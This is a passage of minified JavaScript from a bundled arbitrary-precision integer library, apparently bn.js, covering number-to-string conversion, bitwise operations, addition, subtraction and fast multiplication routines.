R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var ra=(X+(L=Math.imul($e,Ut))|0)+((8191&(h=(h=Math.imul($e,Yt))+Math.imul(st,Ut)|0))<<13)|0;return X=((R=Math.imul(st,Yt))+(h>>>13)|0)+(ra>>>26)|0,ra&=67108863,G[0]=ua,G[1]=Ha,G[2]=Va,G[3]=co,G[4]=io,G[5]=yo,G[6]=Vn,G[7]=Eo,G[8]=Pn,G[9]=lo,G[10]=ao,G[11]=bo,G[12]=$n,G[13]=Do,G[14]=Mo,G[15]=no,G[16]=Kn,G[17]=Sa,G[18]=ra,0!==X&&(G[19]=X,A.length++),A};function x(z,l,f){return(new S).mulp(z,l,f)}function S(z,l){this.x=z,this.y=l}Math.imul||(D=p),I.prototype.mulTo=function(l,f){var A,v=this.length+l.length;return A=10===this.length&&10===l.length?D(this,l,f):v<63?p(this,l,f):v<1024?function w(z,l,f){f.negative=l.negative^z.negative,f.length=z.length+l.length;for(var A=0,v=0,P=0;P<f.length-1;P++){var G=v;v=0;for(var X=67108863&A,L=Math.min(P,l.length-1),h=Math.max(0,P-z.length+1);h<=L;h++){var ue=(0|z.words[P-h])*(0|l.words[h]),Ie=67108863&ue;X=67108863&(Ie=Ie+X|0),v+=(G=(G=G+(ue/67108864|0)|0)+(Ie>>>26)|0)>>>26,G&=67108863}f.words[P]=X,A=G,G=v}return 0!==A?f.words[P]=A:f.length--,f.strip()}(this,l,f):x(this,l,f),A},S.prototype.makeRBT=function(l){for(var f=new Array(l),A=I.prototype._countBits(l)-1,v=0;v<l;v++)f[v]=this.revBin(v,A,l);return f},S.prototype.revBin=function(l,f,A){if(0===l||l===A-1)return l;for(var v=0,P=0;P<f;P++)v|=(1&l)<<f-P-1,l>>=1;return v},S.prototype.permute=function(l,f,A,v,P,G){for(var X=0;X<G;X++)v[X]=f[l[X]],P[X]=A[l[X]]},S.prototype.transform=function(l,f,A,v,P,G){this.permute(G,l,f,A,v,P);for(var X=1;X<P;X<<=1)for(var L=X<<1,h=Math.cos(2*Math.PI/L),R=Math.sin(2*Math.PI/L),J=0;J<P;J+=L)for(var Z=h,ue=R,Ie=0;Ie<X;Ie++){var Ae=A[J+Ie],Ue=v[J+Ie],Xe=A[J+Ie+X],He=v[J+Ie+X],Be=Z*Xe-ue*He;He=Z*He+ue*Xe,A[J+Ie]=Ae+(Xe=Be),v[J+Ie]=Ue+He,A[J+Ie+X]=Ae-Xe,v[J+Ie+X]=Ue-He,Ie!==L&&(Be=h*Z-R*ue,ue=h*ue+R*Z,Z=Be)}},S.prototype.guessLen13b=function(l,f){var A=1|Math.max(f,l),v=1&A,P=0;for(A=A/2|0;A;A>>>=1)P++;return 1<<P+1+v},S.prototype.conjugate=function(l,f,A){if(!(A<=1))for(var v=0;v<A/2;v++){var P=l[v];l[v]=l[A-v-1],l[A-v-1]=P,P=f[v],f[v]=-f[A-v-1],f[A-v-1]=-P}},S.prototype.normalize13b=function(l,f){for(var A=0,v=0;v<f/2;v++){var P=8192*Math.round(l[2*v+1]/f)+Math.round(l[2*v]/f)+A;l[v]=67108863&P,A=P<67108864?0:P/67108864|0}return l},S.prototype.convert13b=function(l,f,A,v){for(var P=0,G=0;G<f;G++)A[2*G]=8191&(P+=0|l[G]),A[2*G+1]=8191&(P>>>=13),P>>>=13;for(G=2*f;G<v;++G)A[G]=0;$(0===P),$(0==(-8192&P))},S.prototype.stub=function(l){for(var f=new Array(l),A=0;A<l;A++)f[A]=0;return f},S.prototype.mulp=function(l,f,A){var v=2*this.guessLen13b(l.length,f.length),P=this.makeRBT(v),G=this.stub(v),X=new Array(v),L=new Array(v),h=new Array(v),R=new Array(v),J=new Array(v),Z=new Array(v),ue=A.words;ue.length=v,this.convert13b(l.words,l.length,X,v),this.convert13b(f.words,f.length,R,v),this.transform(X,G,L,h,v,P),this.transform(R,G,J,Z,v,P);for(var Ie=0;Ie<v;Ie++){var Ae=L[Ie]*J[Ie]-h[Ie]*Z[Ie];h[Ie]=L[Ie]*Z[Ie]+h[Ie]*J[Ie],L[Ie]=Ae}return this.conjugate(L,h,v),this.transform(L,h,ue,G,v,P),this.conjugate(ue,G,v),this.normalize13b(ue,v),A.negative=l.negative^f.negative,A.length=l.length+f.length,A.strip()},I.prototype.mul=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),this.mulTo(l,f)},I.prototype.mulf=function(l){var f=new I(null);return f.words=new Array(this.length+l.length),x(this,l,f)},I.prototype.imul=function(l){return this.clone().mulTo(l,this)},I.prototype.imuln=function(l){$("number"==typeof l),$(l<67108864);for(var f=0,A=0;A<this.length;A++){var v=(0|this.words[A])*l,P=(67108863&v)+(67108863&f);f>>=26,f+=v/67108864|0,f+=P>>>26,this.words[A]=67108863&P}return 